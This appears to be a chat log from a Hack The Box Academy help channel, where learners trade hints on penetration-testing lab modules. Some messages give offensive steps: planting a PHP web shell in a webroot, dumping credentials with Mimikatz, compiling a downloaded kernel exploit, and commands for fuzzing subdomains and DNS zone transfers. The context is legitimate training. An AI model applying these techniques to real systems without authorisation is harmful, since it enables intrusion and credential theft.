i get the above error when running pwn shellcraft amd64.linux.sh -r. I'VE been stuck on that for 3 days now helpppppp!😭

please point in the right direction for Common Services SQL "What is the password for the "mssqlsvc" user?"Nevermind. Found the mssqlsvc pass

hey i need some help with the introduction of the academy thing
https://academy.hackthebox.com/storage/modules/15/docker_target1.png
when i type the docker target it says that it took to long to respond and nothing happens idk what to do
ping me if you can help

repost

Can anyone give me a hint for the ACTIVE DIRECTORY ENUMERATION and ATTACKS final assessment part 2, I'm trying to elevate privileges and take over the SQL01, but maybe I'm overthinking.

For SQL01 have a look at the rights with ||whoami /priv||

Thanks...

Hey

Hi I'm interested to cyber security community what am i doing for join this??

well between all the servers this one is the softer one in bans

i got pelma ban in all others servers

and in this one a i got only 10 hours

.............

Hey can someone assist me with Web Service & API Assessment? I have gained asses via SOAP execute command, but am unsure if this is the correct path or where to go next..

Is there anyone out there that can offer some guidance on the HTB Academy "CROSS-SITE SCRIPTING (XSS)". Facing issues at session hijacking and skills assessment. None of the suggested payloads seem to be working (for me) and tried a variety of solutions.

Ohhhh yeah! Pivoting module down! o/

Evening! I was able to solve hard and medium assessments in Attacking Common Services without help. The Easy is the one I can't figure out. I am able to figure out to get the file or create a file with string in it and load toward to C:/xampp/htdocs directory in both method ftp and mssql. When I load the site. It get to "/N" blank and unable to load the scripts. I tried reverse-shell script and webshell script in php. Any hints ? Thanks in advance!

If you are able to successfully|| plant a file inside the webroot then you are on the home stretch. With a simple php shell we should be able to get code execution.||

execution of the virus

that is hacking

putting a program in the computer and executing it

without alerting the anti virus

Is anyone able to help me point me in the right direction for Web Service & API Assessment? Thanks

Thank you! I figured out what I did wrong. I wouldn't have this solved without your help sir!

Need help with Common Services Attacking Email. found the user. what tool to crack his password? hydra keeps stopping.

never mind, had to restart and then hydra worked

Windows Privilege Escalation Skills 1, I’ve gained a shell as IIS but no matter what I’ve tried I can’t find the ldapadmin password or escalate credentials… any hint ?

So I have been beating myself up trying to solve the 2nd question Skills Assessment:Website in the Login Brute Forcing module

You could DM me, i finished it last week with the help of jarednexgent

Have a look at the rights with ||whoami /priv||

Hey, working on Active Directory Attacking Domain Trusts from Linux. Need some help with dumping ntlm hashes. I really can't understand how to do it

Hey guys, im working on Password Attacks in the Password Reuse / Default Passwords section. I dont understand what the task wants me to da

There was a github link in this section with list on default credentials for different services. If I am not mistaken there is task about mysql. So you should search for default password for mysql there

i'm the same module and currently doing the mut_password.. do you have idea with rule file will be suitable.. i used best64

so i have to donload the list and use this list for passwords in hydra ?

nope, scroll to the top, you should see resources. there is custom.rule file, passwords list and username lists. you will use it the whole module

no, there are 4 default password for mysql. just paste them manually

i thought as much using the custom file rule provided by HTB

thanks

np

with the user found in the section before ?

1 sec. i will check this module again

DM me please

I mutated the file password.list using the HTB provided custom file by hydra couldn't find the password corresponding to sam\

plain password.list or mutated password.list, the is no more options)

and you need hashcat to crack hashes, not hydra

not hashes SSH brute-force

oh sorry, my fault. the password is exactly in mutated list

Can you do the burp intruder module with zap ?

https://academy.hackthebox.com/module/110/section/1054

Wouldn't that defeat the purpose of doing the "burp module"?

I can't fuzz with burp

My machine freezes

it takes to much time

I did some portswigger modules and I did some fuzzing but here it takes too much time my machine expires

Use pwnbox?

it still gives you the community edition

anyway

seams like I can't complete the zap fuzzing room either : (

with zap

You only need community edition to do it...

so I hear but I don't know

i let the fuzzing for 2 hours and received nothing

they say the response is between 200 rquests or somethin ?

I dont recall it taking that long

Hi guys 😊.. question saying ..Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.... It should be done with Subbrute but it not working .. what to do

Domain name not showing anything IP also not showing

Did you use the Target IP as DNS server?

How?

Do you mean I add this IP to the /etc/ hosts

Add the IP to the resolvers.txt file

Okay I will try

Anyone able to help/nudge me with skills assessment - file inclusion? I'm trying to do log poisoning and the site doesn't return the logs after correctly.

Dm

@acoustic owl .. I have add it as you told me but still no results ... This tool not working ( Subbrute)

I get the bad gateway error on the Zap fuzzing module

Show me your command

@acoustic owl ./subbrute inlanefreight.htb -s ./names.txt -r ./resolvers.txt

Show me the Content from the Files names.txt and resolvers.txt

This file is so big

Shall I add domain name to name.txt

Try it like this:
||python3 subbrute.py inlanefreight.htb -s /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt -r ./resolvers.txt||
The file resolvers.txt contains only the target IP.

Hi, Need some technical help in one of the modules for cbbh:
File Inclusion - Log Poisoning
Whenever I try to spawn a machine, after a min the host becomes unreachable, after retrying for a few times getting 'target failed to spawn' error in htb

Are sending tonnes of requests?

Nop, barely 2-3, but doesn't matter if I send any requests or not, after a min the ip becomes unreachable, then I have to spawn another box and so on

Hi all, is anyone else willing to jump of a bridge trying to solve the the Flow Control - Loop in (Intro to Bash Scripting). I have spent days on this now and want to cry!!! Iv'e added the for loop:

for i in {1..28}; do
var=$(echo $var | base64)
if [[ $i == 28 ]]; then
salt=$(echo $var | wc -c)
fi
done

I keep getting a bad decrypt error! Does anyone have any insight or ideas on this?

Someone can help me with DNS zones? I'm in the Active Subdomain Enumeration lesson (Information Gathering Web Edition Module), and I think I have a good grasp on the general concepts of DNS zones (after reading the lessons a gazillion times and doing hours of extra research on the internet), but I don't understand the application of the examples.

• I don't understand how to find out how many zones there are
• Because of that I don't understand when I'm in which zone
• I don't know what exactly the zone transfer transfers form where to where (in theory yes, but not with the examples)

I can't even tell you where exactly my confusion is but after dealing with the topic for hours I still have no idea how to apply what the lesson tries to teach me.

Anyone can help me with that?

Anyone found a solution to this problem?
I'm currently in the getting started. But whenever I attempt to connect with the smbclient I get the following error:

smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

I have already tried changing the min and max protocol in the /etc/samba/smb.conf to min core and max smb3

It's for this one "List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file."

@gusty plover what tool are you using

smbclient

Can I DM you?

Sure

Can I get helpon the skill assessment of Pivoting, Tunneling, and Port Forwarding? 🙂

Has anyone (or is taking) the Pentester or Bugbounty courses?

I am wondering which one to go and would like some input about your personal experience with it

anyone can help me with linux privelege escalation?

Hey, try asking by actually stating what your issue is, easier to help you instead of us trying to fish it out of you.

i need help with kernel exploit

Sure, but what is the actual problem?

I cant complile the kernel

I copy the exploit from a site and then load it up a txt

gcc kernel_expoit.c -o kernel_expoit && chmod +x kernel_expoit

used this command and i keepgetting errors

Ok, so what are the errors?

the errors are saying something is wrong with the code

I copy the code from this website https://vulners.com/zdt/1337DAY-ID-30003

Try download the file, instead of copying the text, maybe you copied something wrongly

otherwise upload the thing you copied to pastebin or something and share it

It seems they have a "Copy To clipboard" button too

thats what I used

but either way, show the error

as it is exactly shown to you

how do i upload img

use some screenshot tool

on Windows you can use Snippet (if you are running linux in a virtual machine)

im talking about into this chat. its not giving me option to

ah, maybe it is a rank problem

to prevent spam and such, maybe you need to approve yourself with the bot so you get the beginner rank

otherwise you can use this and just paste the output in there https://pastebin.com/

@wanton anvil what is the problem withe exploit

cant compile the kernel

it is not the kernel you are compiling, but the script that you download

yes what he said

you use the gcc command to compile the code (make it ready to be used)

and then with the chmod +x you tell your computer "You can run this piece of code, it has the proper rights"

you turn it into something that can be run on the computer

but it is difficult to help you without telling us what the error is exactly

it could be 1 of 1000000 things 😄

i sent you screenshot @tepid hemlock

hey i need some help with the introduction of the academy thing
https://academy.hackthebox.com/storage/modules/15/docker_target1.png
when i type the docker target it says that it took to long to respond and nothing happens idk what to do
ping me if you can help

repost

Hey Guys, can someone help me out with the Web Services & API module assessment? been stuck on it for a while now

Where are you pinging it from @jagged radish ?

firefox

it says to open firefox and to see what happens ig

im using the workstation provided @tepid hemlock

I am not sure, I would try check to see if the docker container is even running

how

That part you can google, just google how to check if docker container running

hi im working on Footprinting MSSQL and already got inside SQL. but i dont know what command to see what information i need to get for this question, can you guy help? thank youuu

Hey Timo, the keyword is the "non-default database" google on that a bit

Unrecognized options or missing extra parameters in xyz.ovpn:12: data-ciphers-fallback
This is the error I got when connecting to htb can someone help me connect my machine

try run it as sudo

i will hack you 😈

Ok…

Not sure this is the right channel to state that

Though

Not helping

Hey, I'm doing Getting Started module (Privleges Escalation rn) and cannot save anything on the pwnbox machine. How can I save a file there? Neither vim nor editor are not working

Nano?

Can I paste form system clipboard to nano?

did you change directories?

ctrl-shift-v will typically paste in linux. Yes, we can copy/paste to and from Nano 😉

By default on the pwnbox you're in /root and won't have permission to write without sudo

You should though I normally use vim

https://tenor.com/view/facepalm-really-stressed-mad-angry-gif-16109475

I was in /root/Desktop instead of ~/Desktop

Thank you everyone 🙂

Unrecognized options or missing extra parameters in xyz.ovpn:12: data-ciphers-fallback
This is the error I got when connecting to htb can someone help me connect my machine
Anyone>?

Hey mate. I think you should use a command line client for accessing to the MSSQL with the provided credentials and then you can google how to list database in MSSQL by the client u re using

My problem solved, thanks guys

someone knows how can i leave this window on hackthebox machine?

Unless you happen to remember the random generated password from the desktop I doubt you can do much except shut it down and boot up a new one (unless a empty password works)

so bad(( need to do 1000000 steps to restore my progress

ive never had this happen to me before. Did you accidentally (or intentionally) lock your screen?

I moved to my native language, then again to english, pressed L and that happened( Don't recommend doing this when you are working on academy)

Windows Key (or special key) + L usually locks the screen. Maybe that combo triggered

probably yes

I'm not sure what your current setup is but in the future you could use the VPN setup. You'd be responsible for downloading and setting up the tools on your own PC though.

https://academy.hackthebox.com/vpn

i know, but thanks)

Update your user_init to uninstall the lockscreen on the pwnbox :D

hackthebox a page with hackeable labs

about to test it in couples days

sounds like a hacker's way to solve this problem)

Hey Guys

I'm stuck at the Broken authentication - predictable reset token

Following the instructions and using the php code that is there I'm no even able to get the same hash as the htbuser

My Ip address is 127.0.0.1

DOS me with LOIC

I'm on the web proxy module I need to enable a button on a response I can see its working and the hint says it won't give the flag on the first click. I've tried to send it to the repeater in zap but only get the request and can't modify the response ti enable the button like I can with zap what am I supposed to do

x.x

Can someone please help me out with the Web Service and API assessment?

hacking for me is littler hard

i have 10 years trying to hack

and i never get to hack a shit

can you teach me to hack??

Hello someone can help me with a hint in the Skill Assessment - Broken Authentication? I have some information (credentials)

were you able to get logged in as the ||support.xx|| user?

yes in the x number of accounts

where xx ||is a country code||

yep, i found some accounts and i get access in each since I got the passwords. I imagine the next step is to decode the session cookie, but I can't find the formula

i found the way to decode the cookie i miss the ":" is the key jejeje

Finally I was able to finish the module, thank you very much for the hints. In the end, I just needed to think outside the box hahaha

Hi guys, I'm stuck on the CROSS-SITE SCRIPTING (XSS) Session Hijacking module. Any advice or step to complete the activity in the pwnbox.... :'v

Hello, can anyone give a hint for the module AD Enumeration & Attacks - Skills Assessment Part II, to do the priv esc for the MS01 , Do I need to use some the creds from previous question (SQL01)?

Still working on the Brute Force Login, 2nd assessment and I found out that by reading the hint for the 1st question is correct. I ran it through Metasploit and got a correct hit

google.com

again google.com

You can use ||Mimikatz on SQL01|| to find credentials

https://www.youtube.com/watch?v=lhz0-qAQlBM

and if you are wondering yes google.com is the best hacking site

This is going to become the auto reply message for teach me to hack and so on messages @vital adder 😅

I'm stack on that task , help me please . Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11). i used as the answer \x00\x09\x20\x67 not working

stupid issue i am having. its probably something stupid.
cant Ffuf for sub-domains/vhosts anymore.....

I have refreshed the servers many times over but no joy.

Add given IP minus the port to hosts file.
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'

Fuff command:
ffuf -w SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://FUZZ.academy.htb/ -H 'host: FUZZ.academy.htb'

All i get is errors........................ help please?

Dm

fixed. Upper case error haha. Thanks all.

any references ?

Why do I get connection refuzed erorrs on zap intruder module ?

sounds like you arent hitting the website? has the IP timer expired on the academy website?

no

until now evertyhing was fine

I used the provided parrot os and ping it

still dosen't work

i would refresh the server IP personally just to see. everytime this has happens to me this method fixes it.

i hope it work at some moment

it says bad Gateway

i DM and will try to help as i finished this module but no promises on a fix. 🙂

ok

not a academy-module, but a burning question:

• there is a server, only port 21 ftp open
• i have found the root password
• BUT i need the local user password
• got the shadow& passwd, but there are no hashes of the users. only root.

--> How to get passwords/hashes of the other users 😮 ?

if its authing against a remote server, there wouldn't be hashes I believe.

Somehow... there must be a way, so that i can answer the question

already tried to get a reverse shell by changeing the crontab file, no success.

@rustic sage did you look in /etc/shadow file

sure. downloaded shadow + passwd,
did "john unshadow" and tried to crack it. no success, of course, because there are no password hashes in the unshadow file.

did you actually look at the shadow file to see if there are hashes?

From that description, it could equally be that john failed to crack the hashes

kevinsmith:!:16497:0:99999:7:::

! instead of hash, thats happens if user is locked/ no password given.

Still dont know how i can answer the question, "whats his password? choose a, b, or c"

Hello Guys
i try to solve the
Shells and Payloads Lie Engagement part

I have to use the noMachine programm but i get every 20 seconds or 3 comands a timeout : (
I tried to change the vpn connection but the Issue is still there

I can't get a connection to the IP from the Zap fuzzing module

I am now using the pwnbox

On my local device is the same even with their VPN

on the "Active Infrastructure Identification", i am stuck on where to add the vhosts. if anyone could give me a hand would be greatly appreciated

I'm on the web proxy assessment I've found how to enable the button but the hint says I need to make it so the button can be clicked multiple times I'm a little lost on how to accomplish that can anyone just point me in a direction to look in?

Try it with the Burp ||Repeater||

who has finished Intro to assembly language I am stuck at the final assesement https://academy.hackthebox.com/module/85/section/909

Hey, can someone help with Active Directory Assignment 1 last question?

hey guys, how i can send commands to the ftp server in the pwnbox

got this wired 200,150,226 message

@leaden quail maybe that person has no access

Anyone indian plz inbox me

Which Active Directory module? There are 5 modules

Problem solved for me ☺️
Just but the IP in the normal browser not in the proxy

Active Directory Enumeration and Attacks

hey can anyone help me with Wordpress structure, finding the flag using directory traversal? I feel like i've looked in every directory and still no flag

feel free to dm me

hey can anyone help me with Wordpress structure, finding the flag using directory traversal? I feel like i've looked in every directory and still no flag

hi, I'm newer here.

Plz help me htb plz provide free acount I share my tryhackme acount 7month premium subscriptions

Those are just return codes, look up "FTP server return codes", Wikipedia has a list

@west canopy.. please help me .. I got stuck in one MFFFF Question for two days now

This MF

Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

Is there a general channel somewhere or am I crazy? I just want to thank the HTB academy team for their hard work. The level of training being provided is leagues ahead of anything else I have see as a beginner in the field and am extremely thankful. ❤️

@lapis pivot do zone transfer

Alright will check

Has anyone here completed the hacking wordpress module?

Hey, could i DM someone about the last question of the Skills Assessment of Pivoting, Tunneling, and Port Forwarding module? I feel i'm really close but something's missing...

Hey, I'm doing the Windows Fundamnetals skill assessment and I got the last two questions right by swapping the user SID for the group SID and vice versa

I'm not sure if I did the steps wrong or if the questions are wrong

yes

hey sk4reKr0w, thanks for responding, I'm stuck on the Wordpress structure /file structure section. I believe I have checked all the core directories and there content, but still have not see the flag.txt

there are no questions in that section. Unless they updated it

someone knows how to use time verter?

opps, I meant, the Directory Indexing section.

@lethal atlas hey coincidentally I JUST found the flag. But I appreciate the response..

excellent work.

?? time verter??

yup it's a tool made to crack reset tokens

https://github.com/D3vil0p3r/timeverter

maybe it's useful for someone

@placid quest I did Zone transfer by using dig AXFR and i use another tool called fierce but still not getting any results from inlanefreight.htb server

@lapis pivot do on internal.inlanefreight.htb

How

Add internal?

@lapis pivot use dig axfr internal.inlanefreight.htb ip address

@placid quest I used dig AXFR internal.inlanefreight.htb 10.129.186.211

nothing happened

I was stuck at the exact same question hehe

It saying transfer failed

dig axfr internal.inlanefreight.htb @rustic sage

do @10.129.186.211

It MF question